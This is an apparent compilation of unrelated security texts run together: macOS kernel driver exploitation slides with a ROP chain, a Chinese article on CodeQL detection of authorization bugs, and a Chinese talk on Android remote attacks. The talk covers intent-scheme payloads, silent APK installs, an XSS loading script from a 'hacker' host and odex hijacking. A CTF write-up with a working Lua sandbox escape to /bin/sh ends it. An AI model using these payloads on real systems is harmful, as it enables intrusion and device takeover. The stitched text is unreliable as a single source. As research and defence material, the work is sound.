• IOHIDLibUserClient: AppleSPUHIDDevice, AppleCSHTDCodecMikey
• IOMobileFramebufferUserClient: AppleCLCD
• IOSurfaceAcceleratorClient: AppleM2ScalerCSCDriver
• AppleJPEGDriverUserClient: AppleJPEGDrive
• IOAccelDevice2, IOAccelSharedUserClient2, IOAccelCommandQueue2:
AGXAccelerator
• AppleKeyStoreUserClient: AppleKeyStore
• IOSurfaceSendRight, IOSurfaceRootUserClient: IOSurfaceRoot
Alibaba Security
New Vulns in Drivers on macOS – Current Secure Status
• Though within kernel, drivers are always blamed for poor quality,
which make them frequently be used to exploit the kernel
• Vulns in drivers used in JailBreaks:
• 11 (v0rtex | electra): IOSurfaceRoot (CVE-2017-13861)
• 9 (pangu): IOMobileFrameBuffer (CVE-2016-4654)
• 8 (TaiG): IOHIDFamily (CVE-2015-5774)
• 7 (pangu): AppleKeyStore (CVE-2014-4407)
• With the help of Ryuk, we found and confirmed some new vulns on
macOS
Alibaba Security
New Vulns in Drivers on macOS – New Vuln 1
• Information Leakage due to uninitialized stack variable in
IOFirewireFamily driver (CVE-2017-7119) – To defeat kaslr
Alibaba Security
New Vulns in Drivers on macOS – New Vuln 1
• Information Leakage due to uninitialized stack variable in
IOFirewireFamily driver (CVE-2017-7119) – To defeat kaslr
Alibaba Security
New Vulns in Drivers on macOS – New Vuln 1
• Information Leakage due to uninitialized stack variable in
IOFirewireFamily driver (CVE-2017-7119) – To defeat kaslr
Alibaba Security
New Vulns in Drivers on macOS – New Vuln 1
• Information Leakage due to uninitialized stack variable in
IOFirewireFamily driver (CVE-2017-7119) – To defeat kaslr
Kernel slide = 0x4ebc0b6-0x8bc0b6 = 0x4600000
Though outChannelHandle is only 32bit, but enough since
the high 32bit is always 0xffffff80 here
Alibaba Security
• CVE-2018-4135: UAF in
IOFirewireFamily driver –
To control PC
• There is no locking or
serialization when
releasing and using a
member variable
• fMem is a member of class
IOFWUserReadCommand
New Vulns in Drivers on macOS – New Vuln 2
Alibaba Security
• CVE-2018-4135: UAF in
IOFirewireFamily driver –
To control PC
• Exploit: race two threads
to call this function on the
same userclient
New Vulns in Drivers on macOS – New Vuln 2
Alibaba Security
• CVE-2018-4135: UAF in
IOFirewireFamily driver –
To control PC
• Exploit: race two threads
to call this function on the
same userclient
New Vulns in Drivers on macOS – New Vuln 2
Alibaba Security
New Vulns in Drivers on macOS – New EXP strategies: Heap Spray
• A new heap spray strategy utilizing OSUnserializeXML on macOS
• io_registry_entry_set_properties: set properties of device, eventually call
is_io_registry_entry_set_properties in kernel
• Some drivers keep any properties set by userspace, e.g., IOHIDEventService
• Pros: the sprayed data can be read; the head of sprayed data is controllable
Alibaba Security
New Vulns in Drivers on macOS – New EXP strategies: ROP
• After controlling PC, we can gain privilege through ROP chain
• ROP chain (most employed from tpwn)
Stack Pivot
_current_proc
_proc_ucred
_posix_cred_get
_bzero
_thread_exception_return
Get ptr to
struct proc of
current process
Get ucred from
struct proc, i.e.,
process
owner's
identity
Get ptr to struct
cr_posix
Exit kernel, return to
userspace
Alibaba Security
New Vulns in Drivers on macOS – New EXP strategies: ROP
• After controlling PC, we can gain privilege through ROP chain
• Key step: Stack Pivot
In tpwn (on 10.10)
In rootsh (on 10.11)
New
Alibaba Security
New Vulns in Drivers on macOS – New EXP strategies: ROP
• After controlling PC, we can gain privilege through ROP chain
• Key step: Stack Pivot
New
Alibaba Security
Addr of Gadget P2
New Stack: RAX+0x50
RAX
Addr of Gadget “NOP; RET;”
_current_proc, MOV RDI, RAX
RAX (Controlled or Known)
RAX+0x30
Gadget
P1
Gadget
P2
_proc_ucred, MOV RDI, RAX
_posix_cred_get, MOV RDI, RAX
_bzero
_thread_exception_return
RAX+0x40: New Stack Start
RAX+0x38
RAX+0x8
New Vulns in Drivers on macOS – Whole EXP Process
Alibaba Security
high space of heap
possessed by heap spray
Heap Spray
Trigger Vuln
Jmp to Gadget P1
Run ROP chain
Control PC
Addr of Gadget P2
New Stack: RAX+0x50
RAX
Addr of Gadget “NOP; RET;”
_current_proc, MOV RDI, RAX
_proc_ucred, MOV RDI, RAX
_posix_cred_get, MOV RDI, RAX
_bzero
_thread_exception_return
Privilege Escalation
New Vulns in Drivers on macOS – Privilege Escalation on 10.13.2
• Privilege escalation on the macOS
On macOS 10.13
On macOS 10.13.2
Alibaba Security
Bugs fixed on macOS 10.13.4
New Vulns in Drivers – Privilege Escalation on macOS 10.13.3
Alibaba Security
Analyze Apple Drivers: Obstacles
• But! Analyzing macOS and iOS kernel drivers is not easy!
• Closed-source
• Programmed in C++
• Lack of Symbols (mainly for iOS)
• Let’s first look at how drivers’ binary code looks like in IDA pro
Alibaba Security
Analyze Apple Drivers: Obstacles
• How does a driver’s binary look like in IDA pro – macOS
• Readable
Many
symbols
are kept
Alibaba Security
Analyze Apple Drivers: Obstacles
• How does a driver’s binary look like in IDA pro – macOS
• Readable
Event better, we
have symbols of
vtables and know
where they are
Alibaba Security
Analyze Apple Drivers: Obstacles
• How does a driver’s binary look like in IDA pro – macOS
• Readable
Even sMethods of
userclients have
symbols
Alibaba Security
Analyze Apple Drivers: Obstacles
• How does a driver’s binary look like in IDA pro – macOS
• Readable
Functions have
meaningful names
(for both internal
and externa).
These names can
be demangled to
know the
argument types
Alibaba Security
Analyze Apple Drivers: Obstacles
• How does a driver’s binary look like in IDA pro – macOS
• Readable
Decompiled code is
partially human-
readable
Alibaba Security
Analyze Apple Drivers: Obstacles
• How does a driver’s binary look like in IDA pro – macOS
• Readable, but not suitable for manual review and static analysis
Types of object
variables are
unknown
Classes’ vtable
function pointers are
used everywhere, IDA
pro cannot recognize.
Alibaba Security
Analyze Apple Drivers: Obstacles
• How does a driver’s binary look like in IDA pro – macOS
• Readable, but not suitable for manual review and static analysis
No structures for
classes
Class sizes are
unknown
Member variables
cannot be recognized
by IDA pro
Alibaba Security
Analyze Apple Drivers: Obstacles
• How does a driver’s binary look like in IDA pro – iOS
• Messy! Nothing useful there! Unreadable, not to mention further
analysis
Functions do not have symbols
Function names are all
meaningless “sub_”
Alibaba Security
Analyze Apple Drivers: Obstacles
• How does a driver’s binary look like in IDA pro – iOS
• Messy! Nothing readable, not to mention further analysis
There is no symbol for
vtables
No clue to know where
vtables are
No entry can be found
Alibaba Security
Analyze Apple Drivers: Obstacles
• How does a driver’s binary look like in IDA pro – iOS
• Messy! Nothing readable, not to mention further analysis
Functions
cannot be
recognized
by IDA pro
Alibaba Security
Analyze Apple Drivers: Obstacles
• How does a driver’s binary look like in IDA pro – iOS
• Messy! Nothing readable, not to mention further analysis
Function names are meaningless
Vtable function pointers are not
recognized
Variables and arguments do not
have any type information
Alibaba Security
Analyze Apple Drivers: Obstacles
• How does a driver’s binary look like in IDA pro – iOS
• Messy! Nothing readable, not to mention further analysis
No structures for classes
Class sizes are unknown
Member variables cannot be
recognized by IDA pro
Alibaba Security
Analyze Apple Drivers: A New Tool
• Ryuk: a new tool to recover symbols and solve object-oriented
features in macOS and iOS drivers
• Ryuk: character in the comics series Death Note, who loves eating apples.
• Implemented as IDA pro python script
Alibaba Security
Ryuk: Design
• Features of Ryuk:
• Class recognition and construction
• Vtable recognition and construction
• Recover function names
• Resolve variable and argument types
• UI support
• …
Alibaba Security
Ryuk: Effects
• Class Recognition and Construction
Alibaba Security
Size
Class Name
Ryuk: Effects
• Vtable recognition and construction
Alibaba Security
Ryuk: Effects
• Vtable recognition and construction
Alibaba Security
Ryuk: Effects
• Recover function names
Alibaba Security
Ryuk: Effects
• Recover function names, resolve variable and argument types,
function pointer and member variable recognition
Alibaba Security
Ryuk: Effects
• UI support
Alibaba Security
Ryuk: Effects
• UI support
Alibaba Security
Ryuk: Effects
• UI support
Alibaba Security
Ryuk: Implementation
• 1. Class recognition and construction
• Functions in __mod_init_func section register all classes
Alibaba Security
macOS
iOS
Ryuk: Implementation
• 1. Class recognition and construction
• Functions in __mod_init_func section register all classes
macOS
iOS
Class Name
Class Size
Parent Class Info
Alibaba Security
*Note: multiple inheritance is excluded in libkern
Registration
Ryuk: Implementation
• 1. Class recognition and construction
• Functions in __mod_init_func section register all classes
Alibaba Security
macOS
iOS
Class Name
Class Size
Parent Class Info
*Note: multiple inheritance is excluded in libkern
Ryuk: Implementation
• 1. Class recognition and construction: Effect
• Structures representing classes are created
Alibaba Security
Ryuk: Implementation
• 2. Vtable recognition and construction
• On macOS, vtables have symbols and known addresses, no need to find
Alibaba Security
Ryuk: Implementation
• 2. Vtable recognition and construction
• On iOS, step 1: adjust the __const section
• Vtables are in __const section, but IDA pro makes it disappear
Alibaba Security
Ryuk: Implementation
• 2. Vtable recognition and construction
• On iOS, step 2: find address of class’s metaclass object
• Functions in __mod_init_func section are parsed again
Alibaba Security
Addrss of class’s metaclass object
Ryuk: Implementation
• 2. Vtable recognition and construction
• On iOS, step 3: Get xrefs to metaclass object
• The xref in const section nears the vtable
Alibaba Security
Ryuk: Implementation
• 2. Vtable recognition and construction
• On iOS, step 3: Get xrefs to metaclass object
• Data before vtables is in some specific format
Xref to metaclass object
Xref to parent’s metaclass
Vtable start preceeding
by 2 zero
Alibaba Security
Ryuk: Implementation
• 2. Vtable recognition and construction: Effects
• Create structures representing vtables and set the first member of classes
as an pointer to their vtable
Alibaba Security
Ryuk: Implementation
• 3. Recover function names (virtual functions on iOS)
• Most classes inherit from basic classes in iokit framework like IOService, OSObject,
etc., which have meaningful function names
• Replace the class name in the overriden virtual functions
Overriden
virtual
functions
Alibaba Security
IOSurfaceRoot::
getMetaCalss
Ryuk: Implementation
• 3. Recover function names (virtual functions on iOS): Effects
Alibaba Security
Ryuk: Implementation
• 4. Resolve variable and argument types
• Step 1: Figure out the creation of variables
Allocation
Cast
Allocation
Constructor
Alibaba Security
Ryuk: Implementation
• 4. Resolve variable and argument types
• Step 2: Variable types are decided
Alibaba Security
Ryuk: Implementation
• 5. UI support
• Purposes:
• Jump to virtual function’s (or children’s) implementation when double-
click on function pointers
• Keep the name and type consistency between function pointer and their
implementation
• Implementation:
• Register action to double-click events
• Register action to key events
• Register action to name change events
• Register action to type change events
Alibaba Security
Ryuk: Benefits
• For manual review:
• Function names are meaningful
• Function pointers are recognized
• Member variable are recognized
• Variable types are known
• You can jump to virtual function’s implementation from their pointers
with just a double-click
• For static analysis:
• Variable types are resolved
• Call targets of function pointers are known
• Further CFG can be easily constructed
Alibaba Security
• Explanation and illustration of 2 new CVEs in macOS drivers
• Illustration of whole exploit chain of privilege escalation on macOS
• Innovative exploitation techniques on latest macOS
• Ryuk: a new tool for assisting the analysis of macOS and iOS drivers
• Most important!
• Ryuk: https://github.com/bxl1989/Ryuk
Alibaba Security
Conclusions
Thanks
Alibaba Security | pdf |
使用静态代码检测微服务越权、未授权访问漏洞
作者:xsser
背景
现在的互联网很多都是来自阿里那一套,公司的整体的应用的架构都
是微服务,在微服务下基于 spring boot 之类的搭建了 一套开发体
系。在历史的发展下,微服务一般发展成这样的架构
安全做为一个属性,需要深入契合这个框架。为什么要讲微服务呢?
因为有统一的框架,可以通过静态代码去一些事情。外购的系统,不
能接入到微服务里的,我们没办法拿到源代码,也自然无法做静态代
码的事情。
难以解决的安全问题
当今在越来越完善的 SDLC 安全建设之下,很多安全问题已经逐步变
少,例如 SQLI、RCE 等,企业的安全建设在研发安全方面已经逐步完
善,常见的 WEB 漏洞已经开始降低,但是有一种漏洞难以解决,且
是常见的 SRC 的高分漏洞,那就是越权漏洞。
2
使用静态代码工具的数据流来检测越权漏洞
相比传统的静态代码检查工具,例如 sonar、pmd 等,现代的静态代
码检查工具多了一些比如数据流的能力,通过图结构的数据查询使得
发现安全漏洞成为了新的能力,传统的静态代码扫描工具仅仅是对代
码质量的检测,检查固定格式的代码。
下面我就以 CodeQL 这个现代化的静态代码扫描工具来举例:
首先。我们从业务角度去思考一个越权的特征:
1) 请求包中的 GET 参数或者 POST 参数中带有”*Id”字样
2) 未使用“用户微服务”对 request 的 id 解析
3) 查询敏感数据或更新数据中的 SQL 语句和 id 等进行了拼接
对这样的场景的抽象,我们就不难写出一个 QL。
第 1 条很好理解,在 ql 里有一个来自 remoteFlowSource 的类可以满
足这个需求;
第 2 条“没有使用用户微服务”是什么意思呢?其实就是当一个参数
传递进来并且没有数据流经过用户服务,换句话就是未使用用户服务
团队提供的 request 解析 api 进行解析(一般用户服务会提供一些 api
来解析 request 的登陆态,并返回这个 request 的 id 值),这里既然没
雨用到用户服务的解析,自然就不会拿到 id;
第 3 条是说这个应用有数据库查询功能,比如更新订单、查询订单的
敏感信息,也就是常见的 CURD。在这个查询中,一般会带一个条
件,就是“where id = ?”,这里的 id 就是从用户传递过来的对象中
拿到的,而非“用户服务”解析出来的;
如何编写这样的 QL 呢?
首先我们肯定需要 dataflow 模块;
然后我们需要 remoteflowSource;
然后需要描述 remoteflowsource->用户服务这个这个数据流的关系;
再然后我们需要描述 remoteflowsource->*query(“sql”+id)中的 id 和
remoteflowsource 之间的关系;
3
最后把上面的步骤通过 and 或者 or 组合起来就可以正确的表达了,
最后我简单的画个图来表达我的思路
看到这里是不是觉得越权也可以实现,并不是很难?
其实只要用关系性图数据库查询就可以解决漏洞了,把越权抽象出
来,通过图语言去描述这个过程即可。
使用静态代码工具的数据流来检测未授权访问漏洞
看过上面的越权检测,相信这个未授权访问非常容易检测。
首先抽象未授权访问的过程:
1) 未使用了用户服务,例如@getLoginIdWithReq
2) 使用了*query 的 jdbc 查询
3) 查询的 sql 中包含 email、phone 等字段
满足以上这样的抽象条件的接口可能不需要登陆就可以返回敏感信
息,导致信息泄露。
所以我们的 QL 应该这样写:
1. 用到 remoteflowsource 类;
2. 查询那些没有@ getLoginIdWithReq 的方法;
4
3. 且方法里有各种 dao,dao 里有 sql 模板拼接 email 或 phone 或其
他敏感信息字段
效果如何
本人在抽空实践中成功实现了一个标准的微服务下的越权检测(通过
src 的漏洞);
朋友经过和我的讨论也实现了这个方法,在不精细的检测中实现了
8K 个随机接口挖到了 150 个越权;
可能存在的坑
数据流断开。我 一般使用 2 分法定位断开,不过现在 CodeQL 有更好
的测试方法了,网上也有人公开了其检测方法;
缺乏 source、sink。这个就不说了 自己去发现和积累;
常见的 不准确的静态代码扫描的坑。这个可以通过长期的反复复盘
积累一定的 isAddtionalStep 去手动链接断点,这个对 ql 语言熟悉程
度有较高的要求,在复杂对象结构下要精准描述,还要带上上下文去
描述,有的时候甚至多个 flow,会比较麻烦,还要精简 ql,否则规则
复杂会导致查询变慢
缺点
较长的查询时间。这个也是常见的静态代码扫描的问题,毕竟复杂的
表达式摆在那
说说我是如何思考的
其实我就是简单的去思考这个越权的过程,和其他漏洞的差异,无非
就是把这个业务的逻辑说清楚,那么整个逻辑图(图结构)就可以满足
描述这个过程,微服务下的越权有统一的框架,会用到用户服务,这
就让越权检测变得简单了。
5
其实我在这里想说,使用 iast 去检测越权也是一样的,只是 iast 需要
流量,套用刚才上面我思考的方法,通过 iast 的堆栈(可以理解成一
个单链的图)也是可以实现越权检测的,但是 iast 跨服务检测比较不
稳定 | pdf |
细数安卓APP那些远程攻击漏洞
z7sky & 行之 @360VulpeckerTeam
演讲者简介
weibo: @0xr0ot
@z7sky
z7sky & 行之
360VulpeckerTeam成员
研究方向:Android 系统安全和第三方APP 安全
概览
Mobile Pwn2Own 2013
Mobile Pwn2Own 2013上安全研究人员Pinkie Pie 利用chrome的两个0day漏洞,实现了远
程代码执行攻击,通过远程的web页面控制了系统。
随后,2014年日本安全研究人员Takeshi Terada 公布了Pwn2own 大赛exploit中intent协议漏
洞的利用方法。
影响面最大的远程攻击入口
意图协议和第三方协议
协议漏洞
Intent协议漏洞
Chrome v18及更早版本,可以通过为iframe的src属性设置自定义的scheme
实现从Web页面启动一个本地应用。其他android浏览器也支持。Chrome v25及
其之后,稍微有了些变化。取而代之的是通过自定义的scheme或者”intent:”来
实现。
Intent Scheme Url
如果浏览器支持intent scheme url,一般
会分三个步骤处理:
1.使用Intent.parseUri(uri);解析url生成
intent对象。
2.对intent对象进行过滤,不同的浏览器过
滤规则有差异。
3.通过Context#startActivityIfNeeded()或
Context#startActivity()等传递步骤2中经过
过滤后的intent来启动activity。
intent:mydata#Intent;action=com.me.om;S.url=file:///mnt/sdcard/Down
load/xss.html;SEL;component=com.ex.uritest/com.ex.uritest.MainActiv
ity;end
另外可以为其设置备用页面,当intent无法被解析或者外部应用不能被启
动时,用户会被重定向到指定页面。
S.browser_fallback_url=[encoded_full_url]
extra
data
selector intent
设置了selector intent 的activity
语法示例
BROWSABLE Category
在继续介绍前先了解两个概念。
1. android.intent.category.BROWSABLE
这个属性配置在AndroidManifest.xml文件中,如果应用组件支持这
个category,表明这个组件通过浏览器打开是安全的,不会对应用自身
产生危害。所以当自己的应用组件比较脆弱或者存在重要业务逻辑时,
一般建议禁止使用这个属性。
Selector Intent
2. Selector Intent
Android API level 15(Android 4.0.3) 引进了Selector intent机制,这个selector
intent可以被绑定到一个main intent上,如果这个main intent拥有selector intent,那么
Android Framework会解析selector intent。
intent://appscan#Intent;S.url=file:///mnt/sdcard/Download/xss.html;SEL;component=com.
ex.uritest/com.ex.uritest.MainActivity;end
SEL表明为com.ex.uritest.MainActivity设置了一个selector intent,那么android
framework会解析这个selector intent,即使com.ex.uritest.MainActivity没有
android.intent.category.BROWSABLE category。
利用SEL特性就可以绕过chrome的一些安全限制。
Intent intent = Intent.parseUri(uri);
intent.addCategory(“android.intent.category.BROWSABLE”);
intent.setComponent(null);
context.startActivityIfNeeded(intent, -1);
1.强制限制只有Category为android.intent.category.BROWSABLE的activity组件
才能接收它的intent。
2.禁止显式调用。
Chrome浏览器的绕过与防护
现在最新的chrome版本已经对selector intent增加了过滤规则.
攻击场景
利用这个漏洞,可以通过浏览器来攻击其他应用以及自身未导出组件。
Cookie Theft & UXSS
案例:攻击自身组件
com.xiaomi.shop.activity.MainActivity能够被外部调用加载任意的网页。
案例:攻击第三方应用
intent:#Intent;component=com.xiaomi.shop/com.xiaomi.shop.activity.MainActivity;S.co
m.xiaomi.shop.extra_closed_url=http://server/acttack.html;end
1.小米手机远程代码执行漏洞
http://blogs.360.cn/360mobile/2014/08/25/miui-rce-vul/
防御:
如果可以使用其他方式实现同样的功能,应尽量避免使用addJavascriptInterface()。
可以通过移除系统接口和动态加载js的方式来防御漏洞的利用。
关于Webview RCE
详见
http://security.360.cn/Index/news/id/59.html
市面上仍受影响的浏览器
action
data
extra
component
BROWSABLE
sel
搜狗浏览器
支持
支持
支持
不支持
需要
支持
猎豹浏览器
支持
支持
支持
不支持
需要
支持
遨游云浏览器
支持
支持
支持
支持(支持显示调
用activity)
不需要
支持
2345浏览器
支持
支持
支持
不支持
需要
支持
欧朋浏览器
支持
支持
支持
支持
不需要
支持
海豚浏览器
支持
支持
支持
支持
不需要
支持
Mercury
支持
支持
支持
支持
不需要
支持
攻击案例(视频)
intent:#Intent;S.url=http://server/attack.html;SEL;
component=com.sohu.inputmethod.sogou/com.sogou.androidtool.WebPushActivity;
end
在安卓4.2以下系统上,搜狗输入法可能会受webview远程代码执行漏洞影响,猎豹浏
览器又可以通过SEL绕过防护。 以猎豹浏览器为跳板,进入搜狗输入法,利用远程代
码执行漏洞控制手机。
2.利用猎豹浏览器攻击搜狗输入法
自动检测及利用
使用Androguard搜索关键函数,parseUri()、loadUrl()、addJavascriptInterface()。
loadUrl可能会加载一个不安全的intent scheme url,另外这个应用还可能存在
webview远程代码执行漏洞,结合起来可以实现危害更大的攻击。
另外可以结合hook等手段实现自动化动态检测及利用。
我们可以通过hook监控intent的方式,来查看intent的哪些数据被发送出来了,
方便研究。
Hook Intent监测
// convert intent scheme URL to intent object Intent
intent = Intent.parseUri(uri);
// forbid launching activities without BROWSABLE category
intent.addCategory("android.intent.category.BROWSABLE");
intent.setComponent(null); // forbid explicit call
intent.setSelector(null); // forbid intent with selector intent
context.startActivityIfNeeded(intent, -1); // start the activity by the intent
通过以上分析,可以得出下面相对比较安全的intent filter方案。
漏洞缓解方案
毕竟安全本身就是不断的攻防对抗过程。
第三方协议漏洞
案例1:腾讯应用宝
tmast://download?downl_biz_id=qb&down_ticket=11&downl_url=https%3A%2f%2fwww.mw
rinfosecurity.com%2fsystem%2fassets%2f934%2foriginal%2fdrozer-agent-2.3.4.apk";
应用宝注册了tmast协议的安装APK功能,却没有做安全限制。可以下载安装任意APK,
由于有秒装功能,所以可以远程静默安装。
<a
href="tmast://webview?url=http://m.tv.sohu.com/hots/128?vid=2xss%22};document.getEleme
ntsByTagName('head')[0].appendChild(document.createElement('script')).src='//hacker/1.js?xx'
;test={x:%22:">TEST2<br>
当时存在一个信任域的XSS,由于众多信任域中有一个sohu的域名,这个腾讯不可控,
导致可以使用该协议加载黑客的JS。
另外应用宝里注册了jsb协议,该协议的功能具体可以参考:
http://qzs.qq.com/open/mobile/yyb_gift_center/open_yyb_gift_test.html
查看源码,可以看到js中封装的框架是通过jsb://协议实现的。
案例2:三星KNOX远程安装漏洞
三星MDM获取更新的请求是通过注册的smdm协议唤起的。
smdm://meow?update_url=http://youserver
MDM客户端首先会取这个url里的update_url,在其后添加/latest,然后发起
HEAD请求,服务端会返回ETag、Content-Length和x-amz-meta-apk-version等。
MDM客户端会检查header中的这三个值,x-amz-meta-apk-version值会与当前
MDM包的版本进行比较。如果x-amz-meta-apk-version版本号大于当前的APK版
本,v0就会被置为1,即需要更新。此时用户手机会弹框提示有新更新,如果用
户点击了确定,就会发送一个get请求,获取apk更新地址等,然而更新地址是外
部可控的。
下载完进行安装时,MDM客户端会调用_installApplication(),该函数的的功能是禁止包验
证 (防止Google扫描APK)。安装完成之后再重新开启包验证。
分析整个客户端的处理逻辑,发现下载之后,安装过程既没有经过验证,也没有向用户
展示请求的权限。
在启动恶意程序时,也可以通过为其注册一个第三方协议,然后通过网页唤醒。
最新版V5.3.0 新浪微博注册了sinaweibo://第三方协议,然而多处接口处理不当,导
致可远程拒绝服务.
案例3:新浪微博
POC:
<script>location.href=“XXX";</script>
XXX=
sinaweibo://browser/close 或
sinaweibo://compose?pack=com.yixia.videoeditor 或
sinaweibo://addgroupmember?containerid=102603
sinaweibo://browser/?url=http://www.vul.com/uxss.html
另外可以利用xss(uxss)、csrf等攻击方式利用登录状态完成一些越权操作。
隐藏在系统中的APP后门:完全开放的服务端口
开放端⼝口漏洞
当开放端口绑定到0.0.0.0,那么任何IP都可以访问。
当开放端口绑定到127.0.0.1,那么同一设备上的应用依然可以访问。
Android应用可能会使用sockets(TCP、UDP、UNIX)在应用间或者自身应用
组件间进行通信。然而这种通信方式本身并没有提供任何身份认证。
新浪微博在native层(libweibohttp.so)实现了一个http server,绑定了127.0.0.1,监听
9527端口。
乌云案例:新浪微博V5.2.0 ID:小荷才露尖尖角
http请求解析处理逻辑位于com.sina.weibo.utils.weibohttpd.a/b/c三个类中。
主要有三种:
1.http://127.0.0.1:9527/login?callback=xxx
2.http://127.0.0.1:9527/query?appid=com.sina.weibo
3.http://127.0.0.1:9527/si?cmp=com.sina.weibo_
访问第一种请求时,如果用户处于登陆状态会返回用户的身份信息。
访问http://127.0.0.1:9527/login?callback=xxx,返回登陆用户的身份信息。
访问http://127.0.0.1:9527/query?appid=com.tencent.mtt ,返回QQ浏览器的安装信息。如
果未安装返回”no install”.
http://127.0.0.1:9527/si?cmp=com.sina.weibo_componentname可
以访问微博中未导出的组件。
访问
http://127.0.0.1:9527/si?cmp=com.sina.weibo_com.sina.weibo.exlibs.NewProjectModeActiv
ityPreLoading可以打开未导出组件“工程模式”,可以在应用权限范围内执行命令。
检测与防御
检测
可以通过netstat命令查看开放端口,系统自带的netstat以及Busybox里的p参数也不
是很好用。Google play上有一款应用:netstat plus,效果图:
防御
通信过程应增加身份校验措施,或者给用户明确的功能连接提示。
原理很简单,直接读取:
/proc/net/tcp
/proc/net/tcp6
/proc/net/udp
/proc/net/udp6
iframe.src =
"http://127.0.0.1:9527/si?cmp=com.sohu.inputmethod.sogou_sogou.mobile.explorer.hotwords.
HotwordsWebViewActivity&data=http://X.X.X.X:80/go.html";
通过新浪微博为跳板,进入搜狗输入法的组件进行下一步攻击。
天上掉下来的通用漏洞:HackingTeam泄漏的0day漏洞
HackingTeam android browser exploit
漏洞:
CVE-2011-1202
CVE-2012-2825
CVE-2012-2871
影响:
android4.3以下系统浏览器
webview
远程代码执行
国内众多第三方浏览器(android 4.4 ~ 5.1)
自定义浏览器内核
腾讯的X5内核
UC的U3内核
百度的T5内核
漏洞1:CVE-2011-1202(信息泄露)
generate-id()引起的信息泄露
内存地址泄漏
patch
漏洞2:CVE-2012-2825(任意地址读)
类型混淆
任意内存读
恶意地址
patch
漏洞3:CVE-2012-2871(任意地址写)
<xsl:for-each select="namespace::*">
Proof of concept (> android 4.4)
信息泄露
内存任意读
内存写漏洞
漏洞利用思路
1、用arrayBuffer在堆中喷大量的特定字符串,利用任意
读漏洞定位内存地址
2、利用任意写漏洞,确定arrayBuffer的起始地址,实现
有限空间任意读写
3、有限空间读写转化为任意地址读写
4、构造ROP chain,覆盖虚函数表指针
X5内核漏洞利用演示
搜狗输入法
HOW?
浏览器作为攻击入口
Weibo作为跳板打开搜狗输入法
浏览器
weibo
搜狗输入法
X5内核
RCE
URL scheme
Server socket,
intent with data
loadUrl
X5内核加载恶意网页,执行代码
想不到的恶意文件:影响千万应用的安卓“寄生兽”漏洞
关于APK的缓存代码
安卓的应用程序apk文件是zip压缩格式的文件,apk文件中包含的classes.dex文
件相当于app的可执行文件,当app运行后系统会对classes.dex进行优化,生成对
应的odex格式的文件。
插件机制引入的攻击点
•
动态加载
•
反射调用
新的攻击入口
•
Zip解压缩漏洞
•
DexClassLoader的缓存校验漏洞
ZipEntry.getName没有过滤”../”
exploit
modTime
crc
1、修改dex,生成odex
2、修改odex
3、生成zip文件
Dalvikvm,不同机型适配
案例1 高德地图及SDK
案例2
输入法关联文件
案例3 UC浏览器
防护方案
对可能的劫持odex的攻击入口漏洞进行修复
对odex文件进行完整性校验
•
zip解压缩漏洞,过滤”../”跳转符
•
adb backup, allowBackup=”false”
•
Odex不要存储在sdcard
•
每次重新生成odex
•
存储odex信息,加载前校验
感谢
360 vulpecker Team:
@RAyH4c
@sniperhg
@zpd2009
Thanks! | pdf |
App
4
1CSRF
CSRF
2
3Cookie
Cookie
CookieXssCookieHttpOnlyXss
/Xss
Cookie
Xss
CookieHttpOnly
HtmlJslogin
location.href
location.href
AppWebViewUrl
AppWebViewDeepLinkAppWebView
Url
Url
AppJsBridgeWebViewNative
WebViewUrlNative
WebViewNativecall
WebView
AppApp
callHook
call
invokeNative()NativeenablePageJsBridge()
Native
UrlNative
app://open/?url=http://www.baidu.com
window.jsBridge.send('{"call": "test"}')
WebViewUrl
WebViewhttp://test.com/://aaa.asdqwe.com
404payload
Naitve
NativeHttp
urlHttp
CookieCookie
CookieHttpOnlyXss
AndroidiOSApp
1DeepLinkAppWebView
2Url://aaa.asdqwe.com Native
3http Cookie
(^|:\/\/)((((\w|-|\.)+\.)(asdqwe\.(cn|com))))($|[\/\?#]\w*)
(^|:\/\/)
://aaa.asdqwe.com
window.jsBridge.send('{"call": "http", "data": {"url": "xxx", "headers":
{"xxx": "xxx"}}}') | pdf |
XCTF WP
AuthorNu1L Team
wpWP
[email protected] 2.0
Nu1L
XCTF WP
lua
BLSMPS
babyjail
babybaes
hardstack
house of pig
hello arm
dngs2010
warmupcms
GSA
apk
Dubbo
space
lamaba
3*3
babydebug
easycms
spider
coturn
lua
local bit_band = bit.band
local bit_lshift = bit.lshift
local bit_rshift = bit.rshift
local math_floor = math.floor
local math_frexp = math.frexp
local math_ldexp = math.ldexp
local math_huge = math.huge
function UInt32sToDouble(low, high)
local negative = false
if high >= 0x80000000 then
negative = true
high = high - 0x80000000
end
local biasedExponent = bit_rshift(bit_band(high, 0x7FF00000), 20)
local mantissa = (bit_band(high, 0x000FFFFF) * 4294967296 + low) / 2 ^ 52
local f
if biasedExponent == 0x0000 then
f = mantissa == 0 and 0 or math_ldexp(mantissa, -1022)
elseif biasedExponent == 0x07FF then
f = mantissa == 0 and math_huge or(math_huge - math_huge)
else
f = math_ldexp(1 + mantissa, biasedExponent - 1023)
end
return negative and -f or f
end
function encode(value)
code = ''
i = 4
while i~=0 do
code = code .. string.char(value%256)
value = value/256
i = i-1
end
return code
end
local function a()
while(1)
do
end
return 1
end
-- 0x40000000 44D7D0
-- 6764A0
local fake =
"\xd0\xd7\x44\x00\xd0\xd7\x44\x00\xd0\xd7\x44\x00\xd0\xd7\x44\x00sh\x00\x00\x00\x00\x00
\x00"..encode(0x044D7E2)..encode(0x044D7E2)..encode(0x044D7E2)
local fa = tonumber( string.format( "%p", fake ), 16 )+ 32
print(encode(fa)) -- 0x451313 451309
local str = "sh\x00\x00\x00\x00\x00\x40"..encode(fa)..encode(fa-1000)..encode(fa-
1000).."\x00\x00\x00\x00"..encode(0x451309).."\x00\x00\x00\x00"..encode(0x451313).."\x0
0\x00\x00\x00aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
print(a)
local address = tonumber( string.format( "%p", str ), 16 )+ 24
print( tonumber( string.format( "%p", str ), 16 ) )
address = UInt32sToDouble( address - 8, 0 )
local func = debug.getinfo( 0, ">f", address ).func
-- print(func)
func("/bin/sh")
BLSMPS
The rogue public-key attack.
https://crypto.stanford.edu/~dabo/pubs/papers/BLSmultisig.html
rustbls12_381msg="admin"scalar
while(1)
do
end
use sha2::{Digest};
fn main() {
let digest = sha2::Sha512::digest(b"admin");
let mut tmp : [u8;64] = [0;64];
let mut i = 0;
for d in digest {
tmp[i] = d;
i = i+1
}
let k = bls12_381::Scalar::from_bytes_wide(&tmp);
println!("{}", k);
}
